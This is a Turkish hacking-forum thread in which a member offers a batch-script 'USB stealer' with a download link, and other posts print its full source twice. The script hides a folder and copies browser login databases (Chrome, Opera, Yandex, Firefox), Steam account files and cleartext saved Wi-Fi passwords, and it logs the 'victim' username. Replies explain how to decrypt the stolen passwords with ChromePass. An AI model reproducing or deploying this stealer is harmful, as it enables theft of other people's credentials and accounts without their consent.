M0NE3Y USB STEALER v1.0

Yufes

Yeni üye
6 Ağu 2019
9
0
Merhaba ben Yufes,

Sizlere kendi yaptığım usb stealerı göstermek istedim,
Not : M0N3Y sadece windows platformunda çalışabilmekte çünkü bat ile yazıldı.

M0NE3Y şunları yapabilmekte ;
-Kayıtlı modem şifrelerini çalma,
-ip config çıktısı alma,
-Google,Opera,Firefox ve Yandex login datalarını çalma
-Anlık çalışan uygulamaları gösterme,
-Steam id ve ismini çalma,
-Arama Geçmişini gösterme.

linke geçmeden önce belirtmeliyim,ben daha acemiyim ve bu uygulama bat ile yazıldı.
lütfen yorumlarınızı ona göre yapınız.

VirusTotal :
https://www.virustotal.com/gui/file/c8ed82619145fb0138a7575c7e3779adebaa3b986374891e674ca3e32fe3b4fe/detection

İndirme linki ;
https://www.dosya.tc/server25/ez1gkh/M0NE3Y_USB_STEALER.exe.html

İyi günlerde kullanın!
 

x4807

Katılımcı Üye
10 Ağu 2019
985
17
Ellerine sağlık kaynak kodlarını öm'den atabilirmisin?
 

zalim5811

Üye
3 Eki 2012
72
30
Ellerine sağlık kaynak kodlarını öm'den atabilirmisin?
Kod:
:kurulum [USER=14298]echo[/USER] off
for /F "tokens=2" %%i in ('date /t') do set mydate=%%i
set mytime=%time%
set cks =%mydate%:%mytime%
set vars=%cks::=. %
set name="..%username%.."
set dosya=%random%
color 0c
cls
title Usb Stealer - Upgraded /Yufes/
:kurulumklasor
md %name%%dosya%
attrib +s +h %name%%dosya%
cd %name%%dosya%
md 1-calinanlar
md 2-wifi
cd 1-calinanlar
md internet-sifreleri
md Steam-name_id
cd Steam-name_id
copy "C:\Program Files (x86)\Steam\config\loginusers.vdf" kullanici-isim_ve_id.txt
cd ../
cd internet-sifreleri
md firefox
md google
md opera
md yandex
:passwordsteal
cd google
copy "%userprofile%\AppData\Local\Google\Chrome\User Data\Default\Login Data"
cd../
cd opera
copy "%userprofile%\AppData\Roaming\Opera Software\Opera Stable\Login Data"
cd../
cd yandex
copy "%userprofile%\AppData\Local\Yandex\YandexBrowser\User Data\Default"
cd../
cd firefox
copy "%userprofile%\AppData\Mozilla\Firefox\Profiles"
cd ../../../
:2-wifihacking
cd 2-wifi
ipconfig /displaydns>aramagecmisi.txt
ipconfig>ipconfig.txt
rem Saved in D:\Temp\%random%.bat [USER=14298]echo[/USER] . >>!KayitliModemler.txt [USER=14298]echo[/USER] . >>!KayitliModemler.txt [USER=14298]echo[/USER] . >>!KayitliModemler.txt [USER=14298]echo[/USER] /////////////////////////////////////////////////////////////////////////////////////>>!KayitliModemler.txt [USER=14298]echo[/USER] //////////////////////////Created By Yufes///////////////////////////////////////////>>!KayitliModemler.txt [USER=14298]echo[/USER] ////////////////////////////////Thanks For Using/////////////////////////////////////>>!KayitliModemler.txt [USER=14298]echo[/USER] /////////////////////////////////////////////////////////////////////////////////////>>!KayitliModemler.txt [USER=14298]echo[/USER] . >>!KayitliModemler.txt [USER=14298]echo[/USER] . >>!KayitliModemler.txt [USER=14298]echo[/USER] . >>!KayitliModemler.txt
netsh wlan show profile * key=clear >>!KayitliModemler.txt
cd../
:hackinginf
for /F "tokens=2" %%i in ('date /t') do set mydate=%%i
set mytime=%time%
rem Saved in D:\Temp\WriteText.bat [USER=14298]echo[/USER] off [USER=14298]echo[/USER] ----------------------------------------------------------------------------------------------------------------------> 4-bilgi.txt [USER=14298]echo[/USER] /////////////////////////////////////////////////////////////////////////////////////>>4-bilgi.txt [USER=14298]echo[/USER] //////////////////////////Created By Yufes///////////////////////////////////////////>>4-bilgi.txt [USER=14298]echo[/USER] ////////////////////////////////Thanks For Using/////////////////////////////////////>>4-bilgi.txt [USER=14298]echo[/USER] /////////////////////////////////////////////////////////////////////////////////////>>4-bilgi.txt [USER=14298]echo[/USER] ---------------------------------------------------------------------------------------------------------------------->> 4-bilgi.txt [USER=14298]echo[/USER] ---------------------------------------------------------------------------------------------------------------------->> 4-bilgi.txt [USER=14298]echo[/USER] Kurban ismi : %username%>> 4-bilgi.txt [USER=14298]echo[/USER] Calistirildigi Tarih/Zaman : %mydate%:%mytime%>> 4-bilgi.txt [USER=14298]echo[/USER] /////////////////////////////////////////////////////////////////////////////////////> 3-calisan_gorevler.txt [USER=14298]echo[/USER] //////////////////////////Created By Yufes/////////////////////////////////////////// >> 3-calisan_gorevler.txt [USER=14298]echo[/USER] ////////////////////////////////Thanks For Using/////////////////////////////////////>> 3-calisan_gorevler.txt [USER=14298]echo[/USER] /////////////////////////////////////////////////////////////////////////////////////>> 3-calisan_gorevler.txt [USER=14298]echo[/USER] Calisan gorevlerin listesi ; >> 3-calisan_gorevler.txt [USER=537368]task[/USER]list >> 3-calisan_gorevler.txt
cls
:lastof
ROBOCOPY 1-calinanlar 1-calinanlar /S /MOVE
cd../
attrib -s -h %name%%dosya%
 

Yufes

Yeni üye
6 Ağu 2019
9
0
Kod:
:kurulum [USER=14298]echo[/USER] off
for /F "tokens=2" %%i in ('date /t') do set mydate=%%i
set mytime=%time%
set cks =%mydate%:%mytime%
set vars=%cks::=. %
set name="..%username%.."
set dosya=%random%
color 0c
cls
title Usb Stealer - Upgraded /Yufes/
:kurulumklasor
md %name%%dosya%
attrib +s +h %name%%dosya%
cd %name%%dosya%
md 1-calinanlar
md 2-wifi
cd 1-calinanlar
md internet-sifreleri
md Steam-name_id
cd Steam-name_id
copy "C:\Program Files (x86)\Steam\config\loginusers.vdf" kullanici-isim_ve_id.txt
cd ../
cd internet-sifreleri
md firefox
md google
md opera
md yandex
:passwordsteal
cd google
copy "%userprofile%\AppData\Local\Google\Chrome\User Data\Default\Login Data"
cd../
cd opera
copy "%userprofile%\AppData\Roaming\Opera Software\Opera Stable\Login Data"
cd../
cd yandex
copy "%userprofile%\AppData\Local\Yandex\YandexBrowser\User Data\Default"
cd../
cd firefox
copy "%userprofile%\AppData\Mozilla\Firefox\Profiles"
cd ../../../
:2-wifihacking
cd 2-wifi
ipconfig /displaydns>aramagecmisi.txt
ipconfig>ipconfig.txt
rem Saved in D:\Temp\%random%.bat [USER=14298]echo[/USER] . >>!KayitliModemler.txt [USER=14298]echo[/USER] . >>!KayitliModemler.txt [USER=14298]echo[/USER] . >>!KayitliModemler.txt [USER=14298]echo[/USER] /////////////////////////////////////////////////////////////////////////////////////>>!KayitliModemler.txt [USER=14298]echo[/USER] //////////////////////////Created By Yufes///////////////////////////////////////////>>!KayitliModemler.txt [USER=14298]echo[/USER] ////////////////////////////////Thanks For Using/////////////////////////////////////>>!KayitliModemler.txt [USER=14298]echo[/USER] /////////////////////////////////////////////////////////////////////////////////////>>!KayitliModemler.txt [USER=14298]echo[/USER] . >>!KayitliModemler.txt [USER=14298]echo[/USER] . >>!KayitliModemler.txt [USER=14298]echo[/USER] . >>!KayitliModemler.txt
netsh wlan show profile * key=clear >>!KayitliModemler.txt
cd../
:hackinginf
for /F "tokens=2" %%i in ('date /t') do set mydate=%%i
set mytime=%time%
rem Saved in D:\Temp\WriteText.bat [USER=14298]echo[/USER] off [USER=14298]echo[/USER] ----------------------------------------------------------------------------------------------------------------------> 4-bilgi.txt [USER=14298]echo[/USER] /////////////////////////////////////////////////////////////////////////////////////>>4-bilgi.txt [USER=14298]echo[/USER] //////////////////////////Created By Yufes///////////////////////////////////////////>>4-bilgi.txt [USER=14298]echo[/USER] ////////////////////////////////Thanks For Using/////////////////////////////////////>>4-bilgi.txt [USER=14298]echo[/USER] /////////////////////////////////////////////////////////////////////////////////////>>4-bilgi.txt [USER=14298]echo[/USER] ---------------------------------------------------------------------------------------------------------------------->> 4-bilgi.txt [USER=14298]echo[/USER] ---------------------------------------------------------------------------------------------------------------------->> 4-bilgi.txt [USER=14298]echo[/USER] Kurban ismi : %username%>> 4-bilgi.txt [USER=14298]echo[/USER] Calistirildigi Tarih/Zaman : %mydate%:%mytime%>> 4-bilgi.txt [USER=14298]echo[/USER] /////////////////////////////////////////////////////////////////////////////////////> 3-calisan_gorevler.txt [USER=14298]echo[/USER] //////////////////////////Created By Yufes/////////////////////////////////////////// >> 3-calisan_gorevler.txt [USER=14298]echo[/USER] ////////////////////////////////Thanks For Using/////////////////////////////////////>> 3-calisan_gorevler.txt [USER=14298]echo[/USER] /////////////////////////////////////////////////////////////////////////////////////>> 3-calisan_gorevler.txt [USER=14298]echo[/USER] Calisan gorevlerin listesi ; >> 3-calisan_gorevler.txt [USER=537368]task[/USER]list >> 3-calisan_gorevler.txt
cls
:lastof
ROBOCOPY 1-calinanlar 1-calinanlar /S /MOVE
cd../
attrib -s -h %name%%dosya%
Nasıl kodlari kirdin ?
 

zalim5811

Üye
3 Eki 2012
72
30
Nasıl kodlari kirdin ?
kodu "kırmadım". Batch scripti olduğunu kendin söylemişsin. sen scriptini exe'ye çevirdiğinde onu derlemiş olmuyorsun, sadece exe için gereken section/header vs. ile "wrapliyorsun", zip gibi düşün. kodunun okunamamasını istiyorsan bir programlama diliyle yazıp derlemelisin.
 

rtfsec

Üye
27 Eki 2019
87
0
Kayıtlı şifreler Login Data adında bir dosyayla geliyor o dosya nasıl acılacak yani şifreleri nasıl okucaz
 

Yufes

Yeni üye
6 Ağu 2019
9
0
Dostum 4. bilgide kendi resmi adım çıktı onu nerden çekti acaba güvenlik amaçlı söylüyorum
Bilgisayar adini otomatik kopyaliyor,korkulacak birşey yok.

Bat dosyasini exeye cevirirken virus olarak algilaniyor.Uygulamadan kaynakli degil tum bat to exe ceviricileri boyle.

Kayıtlı şifreler Login Data adında bir dosyayla geliyor o dosya nasıl acılacak yani şifreleri nasıl okucaz
Chromepass yukluyosun orda sol uste tiklayip dosya yolunu datanin oldugu klasörü seciyorsun.
Not:tek seferde 1 tane okutturabilirsin.

Exe ye dönüştürülmüş bat dosyasini notepad++ ile okumaya çalışınca kodlar gözükmüyor.
 
Moderatör tarafında düzenlendi:

AsuriGazani

Yeni üye
13 Ocak 2019
17
0
virüs şüpheniz var ise verilen kodu not defteri olarak farklı kaydetip isminin sonuna .bat eklemeniz yeterlidir böylelikle aynı uygulamayı kendiniz yapmış olurusnuz
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.